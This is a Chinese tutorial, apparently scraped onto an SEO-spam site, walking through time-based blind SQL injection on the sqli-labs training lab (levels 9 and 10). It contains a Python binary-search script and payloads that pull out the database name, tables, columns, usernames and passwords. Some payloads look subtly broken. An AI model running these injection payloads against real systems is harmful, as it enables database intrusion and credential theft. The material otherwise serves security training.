当前位置: 首页 > news >正文

怎么用idea做响应式网站seo外包大型公司

news 2025/7/28 0:22:29
怎么用idea做响应式网站,seo外包大型公司,学校手机网站模板,佛山品牌网站建设第九关: 这一关相比第八关,第八关他正确显示you are in,错误不显示you are in,但是第九关你不管是输入正确或者错误都显示 you are in ,这个时候布尔盲注就不适合我们用,所以我们的换一下思路,布尔盲注适合页面对于错误和正确结果…

第九关:

这一关相比第八关,第八关他正确显示you are in,错误不显示you are in,但是第九关你不管是输入正确或者错误都显示 you are in ,这个时候布尔盲注就不适合我们用,所以我们的换一下思路,布尔盲注适合页面对于错误和正确结果有不同反应。如果页面一直不变这个时候我们可以考虑使用时间盲注。

判断注入点

             基于时间的注入(延时注入)

             1. Time-based blind SQL injection
                2.利用前提:页面没有显示位,也没有输入SQL语句执行错误信息,正确的SQL语句和错误的返回页面都一样,但
                是加入sleep(5)条件后,正确的SQL语句页面返回速度明显慢了5秒,错误的SQL语句立即返回。
                3.优点:不需要显示位,不需要报错信息。
                4.缺点:速度慢,耗费大量时间
                5.用法:IF(Condition,A,B)函数
                当Condition为TRUE时,返回A;否则返回B。     
                6.示例:    SELECT * FROM users WHERE id=1 AND IF(ASCII(SUBSTR(USER(),1,1))>65 ,SLEEP(5),1);     
 

?id=1' and sleep(3) --+          有明显延迟
?id=1" and sleep(3) --+          无延迟
?id=1') and sleep(3) --+         无延迟

说明这里的闭合是单引号。   位数暂时不判断了,用脚本的话不需要位数

当请求错误时,延迟时间在3S以后

当请求正确时,延迟时间很短,在3S以内

基于这个我们就可以写脚本来帮助我们注入

import time
import requests
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
#二分法
def inject_database(url):name=""for i in range(1,20):low =32high = 128mid = (low + high) // 2while low < high:payload = "1' and if(ascii(substr(database(),%d,1)) > %d,sleep(1),0)-- " % (i, mid)params = {"id": payload}start_time = time.time()r = requests.get(url,params=params)end_time = time.time()if end_time - start_time >= 1:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32:breakname += chr(mid)print(name)inject_database(url)

有点慢,但是也是成功拿下数据

下边的操作和之前的一样

爆表

payload = "1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='security'),%d,1)) > %d,sleep(1),0)-- " % (i, mid) 

爆字段

payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

username,password

payload = "1' and if(ascii(substr((select group_concat(username) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

            payload = "1' and if(ascii(substr((select group_concat(password) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

拿下

第十关:

和第九关不一样的就是这里是双引号

还是时间盲注,稍微修改,直接使用

 

成功拿到数据库 ,后边的操作都是如法炮制!!!

http://www.yidumall.com/news/45545.html

相关文章:

  • 哪家购物网站建设好小广告公司如何起步
  • 网站后台要怎么做下载谷歌浏览器
  • 贵阳微网站建设公司哪家好百度竞价代运营公司
  • 前端如何做能切换语言的网站seo综合查询是什么意思
  • 记账凭证做网站摘要怎么写站长工具查询官网
  • 做网站的宣传语优化防疫政策
  • 网站建设挣钱seo网站诊断方案
  • 工程造价价格信息网seo外包优化服务商
  • 成都企业网站建设公司电话营销战略有哪些内容
  • 做网站推广的 什么是开户推广产品
  • perl php 网站开发广州seo排名优化公司
  • 怎么做同城购物网站直销怎么做才最快成功
  • 贵州网站开发网络营销是做什么的工作
  • 教学平台网站建设合同搜索引擎营销sem
  • 酒类做网站百姓网推广电话
  • 中山网站只设计福州百度网站排名优化
  • 校园网网站分页党群建设seo推广视频隐迅推专业
  • aspcms开源企业网站建设系统网站流量统计分析
  • 妈妈在家里做女视频网站安卓优化大师手机版
  • 免费软件下载网网站百度seo关键词优化
  • 17173网游排行榜如何做好seo优化
  • wordpress图片shuiyinseo诊断报告怎么写
  • 校园网站建设管理工作制度seo云优化是什么意思
  • 包牛牛网站怎么做博客网站
  • 传奇手游大型网站seo计费怎么刷关键词的
  • 盐城做网站百度网盘资源搜索入口
  • 眼镜 商城 网站建设全国互联网营销大赛官网
  • 哈什么网一个网站做ppt网站权重查询
  • 做网站都需要租服务器吗百度移动端点赞排名软件
  • 怎样利用云盘做电影网站公司网络组建方案